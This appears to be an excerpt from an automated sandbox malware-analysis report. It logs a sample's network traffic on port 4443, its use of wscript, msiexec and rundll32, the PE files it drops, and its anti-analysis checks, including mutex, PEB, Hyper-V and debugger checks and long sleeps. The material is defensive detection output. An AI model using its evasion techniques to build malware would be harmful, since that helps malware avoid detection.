                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49901
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49906
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49939
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-45781
                  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_4-46312
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,4_2_7F2DB260
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\813848\813848.winmdJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6890.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI67E2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6850.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI68B0.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 5.4 %
                  Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.2 %
                  Source: C:\Windows\System32\msiexec.exe TID: 6316Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 980Thread sleep count: 53 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 980Thread sleep time: -6890000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DADB0 GetSystemInfo,4_2_7F2DADB0
                  Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-45755
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_7F2F1417
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B9830 mov edx, dword ptr fs:[00000030h]4_2_7F2B9830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C3740 mov ecx, dword ptr fs:[00000030h]4_2_7F2C3740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C3740 mov ecx, dword ptr fs:[00000030h]4_2_7F2C3740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C3740 mov eax, dword ptr fs:[00000030h]4_2_7F2C3740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C3740 mov edx, dword ptr fs:[00000030h]4_2_7F2C3740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D7660 mov ecx, dword ptr fs:[00000030h]4_2_7F2D7660
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DB260 mov ecx, dword ptr fs:[00000030h]4_2_7F2DB260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DB260 mov eax, dword ptr fs:[00000030h]4_2_7F2DB260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DB260 mov edx, dword ptr fs:[00000030h]4_2_7F2DB260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DB260 mov eax, dword ptr fs:[00000030h]4_2_7F2DB260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DB260 mov ecx, dword ptr fs:[00000030h]4_2_7F2DB260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECDA9 mov eax, dword ptr fs:[00000030h]4_2_7F2ECDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECDA9 mov ecx, dword ptr fs:[00000030h]4_2_7F2ECDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DADB0 mov edx, dword ptr fs:[00000030h]4_2_7F2DADB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E0C00 mov ecx, dword ptr fs:[00000030h]4_2_7F2E0C00
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DE690 mov ecx, dword ptr fs:[00000030h]4_2_7F2DE690
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov edx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov eax, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov eax, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov edx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov eax, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov eax, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov edx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov ecx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov eax, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 mov edx, dword ptr fs:[00000030h]4_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DE1C0 mov edx, dword ptr fs:[00000030h]4_2_7F2DE1C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov edx, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov ecx, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov edx, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB0 mov eax, dword ptr fs:[00000030h]4_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D5EC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2D5EC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov ecx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov ecx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov ecx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov edx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov ecx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov eax, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD40 mov ecx, dword ptr fs:[00000030h]4_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E7D90 mov ecx, dword ptr fs:[00000030h]4_2_7F2E7D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E7D90 mov edx, dword ptr fs:[00000030h]4_2_7F2E7D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E7D90 mov eax, dword ptr fs:[00000030h]4_2_7F2E7D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E7D90 mov ecx, dword ptr fs:[00000030h]4_2_7F2E7D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2EDDF9 mov eax, dword ptr fs:[00000030h]4_2_7F2EDDF9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C5CD0 mov ecx, dword ptr fs:[00000030h]4_2_7F2C5CD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BDA10 mov edx, dword ptr fs:[00000030h]4_2_7F2BDA10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BDA10 mov eax, dword ptr fs:[00000030h]4_2_7F2BDA10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F307A0D mov eax, dword ptr fs:[00000030h]4_2_7F307A0D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D9A90 mov eax, dword ptr fs:[00000030h]4_2_7F2D9A90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov edx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov eax, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC0 mov ecx, dword ptr fs:[00000030h]4_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F307998 mov eax, dword ptr fs:[00000030h]4_2_7F307998
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F3079DC mov eax, dword ptr fs:[00000030h]4_2_7F3079DC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ED7A5 mov eax, dword ptr fs:[00000030h]4_2_7F2ED7A5
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2EF610 mov eax, dword ptr fs:[00000030h]4_2_7F2EF610
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BD6C0 mov edx, dword ptr fs:[00000030h]4_2_7F2BD6C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ED47E mov eax, dword ptr fs:[00000030h]4_2_7F2ED47E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BD370 mov edx, dword ptr fs:[00000030h]4_2_7F2BD370
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DD3E0 mov ecx, dword ptr fs:[00000030h]4_2_7F2DD3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DD3E0 mov eax, dword ptr fs:[00000030h]4_2_7F2DD3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DD3E0 mov ecx, dword ptr fs:[00000030h]4_2_7F2DD3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DD3E0 mov edx, dword ptr fs:[00000030h]4_2_7F2DD3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DD3E0 mov eax, dword ptr fs:[00000030h]4_2_7F2DD3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B72D0 mov edx, dword ptr fs:[00000030h]4_2_7F2B72D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ED039 mov eax, dword ptr fs:[00000030h]4_2_7F2ED039
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B8F30 mov edx, dword ptr fs:[00000030h]4_2_7F2B8F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B8F30 mov ecx, dword ptr fs:[00000030h]4_2_7F2B8F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B8F30 mov ecx, dword ptr fs:[00000030h]4_2_7F2B8F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B6F1A mov eax, dword ptr fs:[00000030h]4_2_7F2B6F1A
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DAF60 mov eax, dword ptr fs:[00000030h]4_2_7F2DAF60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECE02 mov eax, dword ptr fs:[00000030h]4_2_7F2ECE02
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov edx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov edx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov edx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov eax, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov edx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov ecx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov ecx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov ecx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C8E10 mov edx, dword ptr fs:[00000030h]4_2_7F2C8E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECE45 mov eax, dword ptr fs:[00000030h]4_2_7F2ECE45
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B6E80 mov eax, dword ptr fs:[00000030h]4_2_7F2B6E80
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECE97 mov eax, dword ptr fs:[00000030h]4_2_7F2ECE97
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B6C70 mov edx, dword ptr fs:[00000030h]4_2_7F2B6C70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C2A20 mov eax, dword ptr fs:[00000030h]4_2_7F2C2A20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov ecx, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov ecx, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA800 mov eax, dword ptr fs:[00000030h]4_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E8870 mov ecx, dword ptr fs:[00000030h]4_2_7F2E8870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E8870 mov edx, dword ptr fs:[00000030h]4_2_7F2E8870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E8870 mov eax, dword ptr fs:[00000030h]4_2_7F2E8870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E8870 mov ecx, dword ptr fs:[00000030h]4_2_7F2E8870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F3007C8 mov ecx, dword ptr fs:[00000030h]4_2_7F3007C8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B47D4 mov ecx, dword ptr fs:[00000030h]4_2_7F2B47D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B47D4 mov ecx, dword ptr fs:[00000030h]4_2_7F2B47D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B47D4 mov edx, dword ptr fs:[00000030h]4_2_7F2B47D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DA560 mov ecx, dword ptr fs:[00000030h]4_2_7F2DA560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DA560 mov eax, dword ptr fs:[00000030h]4_2_7F2DA560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DA560 mov ecx, dword ptr fs:[00000030h]4_2_7F2DA560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2BE5A0 mov eax, dword ptr fs:[00000030h]4_2_7F2BE5A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C2420 mov edx, dword ptr fs:[00000030h]4_2_7F2C2420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C2420 mov eax, dword ptr fs:[00000030h]4_2_7F2C2420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DE3A0 mov eax, dword ptr fs:[00000030h]4_2_7F2DE3A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C4392 mov edx, dword ptr fs:[00000030h]4_2_7F2C4392
